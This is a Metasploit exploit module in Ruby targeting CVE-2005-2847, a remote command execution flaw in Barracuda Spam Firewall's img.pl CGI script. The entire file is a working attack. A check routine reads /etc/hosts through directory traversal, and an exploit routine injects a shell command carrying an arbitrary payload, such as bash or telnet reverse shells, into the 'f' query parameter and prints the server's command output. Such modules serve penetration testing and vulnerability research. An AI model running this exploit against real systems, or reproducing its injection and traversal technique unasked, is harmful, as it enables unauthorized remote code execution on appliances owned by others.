##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Barracuda IMG.PL Remote Command Execution',
        'Description' => %q{
          This module exploits an arbitrary command execution vulnerability in the
          Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.
        },
        'Author' => [ 'Nicolas Gregoire <ngregoire[at]exaprobe.com>', 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2005-2847'],
          ['OSVDB', '19279'],
          ['BID', '14712'],
          ['URL', 'http://www.nessus.org/plugins/index.php?view=single&id=19556']
        ],
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true,
          'Space' => 4000,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd cmd_bash',
                          'RequiredCmd' => 'generic perl ruby bash-tcp telnet',
                        }
        },
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Targets' => [[ 'Automatic', {}]],
        'DisclosureDate' => '2005-09-01',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('URI', [true, "The full URI path to img.pl", "/cgi-bin/img.pl"]),
      ]
    )
  end

  def check
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['URI']),
      'vars_get' =>
      {
        'f' => ("../" * 8) + "etc/hosts"
      }
    }, 25)

    if (res and res.body.match(/localhost/))
      return Exploit::CheckCode::Vulnerable('The target is vulnerable')
    end

    return Exploit::CheckCode::Safe('The target is not vulnerable')
  end

  def exploit
    res = send_request_cgi({
      'uri' => normalize_uri(datastore['URI']),
      'vars_get' =>
      {
        'f' => ("../" * 8) + %Q!bin/sh -c "echo 'YYY'; #{payload.encoded}; echo 'YYY'"|!
      }
    }, 25)

    if (res)
      print_status("The server returned: #{res.code} #{res.message}")
      print("")

      m = res.body.match(/YYY(.*)YYY/)

      if (m)
        print_status("Command output from the server:")
        print(m[1])
      else
        print_status("This server may not be vulnerable")
      end

    else
      print_status("No response from the server")
    end
  end
end
